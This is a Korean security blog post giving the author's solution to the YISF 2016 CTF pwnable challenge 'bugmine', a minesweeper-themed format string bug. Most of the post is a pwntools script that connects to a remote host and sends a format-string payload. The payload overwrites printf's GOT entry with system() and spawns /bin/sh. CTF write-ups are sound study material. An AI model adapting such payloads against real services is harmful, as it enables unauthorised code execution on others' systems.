Notice
Recent Posts
Recent Comments
Link
«   2025/07   »
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

cdor1's lab

YISF 2016 bugmine 본문

Security/Pwnable

YISF 2016 bugmine

Cdor1 2017. 2. 15. 18:42

후기 : 우분투 정리하다가 예~전에 YISF예선에서 풀었던 100점짜리 문제를 찾아서 올린다.

지뢰찾기를 모티브로한 FSB문제였다.


from pwn import *
s = remote('112.166.114.136',38961)

payload = ""
payload += p32(0x0804c012) # printf_got 2
payload += p32(0x0804c010) # printf_got 1
payload += "%"+"2044"+"c"+"%3$hn"+"%"+"32140"+"c"+"%4$hn"
payload += ";/bin/sh" # get shell after FSB

print s.recvuntil('$') 
s.sendline('1') 

print s.recvuntil('$')
s.sendline('1')

for i in range (0,5): # Go to register routine
	print s.recvuntil('$')
	s.sendline('1')
	print s.recvuntil('$')
	s.sendline('3 3')
	sleep(0.2)

print s.recvuntil(':')
s.sendline(payload) # send Payload
s.recvline('$')

s.sendline('2') # FSB printf_got -> system_plt
s.recvline('$') 
s.sendline('2') # system("/bin/sh")

s.interactive() # Enjoy :)

'Security > Pwnable' 카테고리의 다른 글

Plaid CTF 2013 ropasaurusrex  (4) 2017.02.16
BCTF ruin  (0) 2017.02.15
pwnable.kr brain fuck  (0) 2017.02.15
MMA CTF 2nd 2016 shadow  (0) 2017.02.14
openCTF 2016 tyro_heap  (0) 2017.02.14
공유하기 링크
'Security/Pwnable' Related Articles more
Comments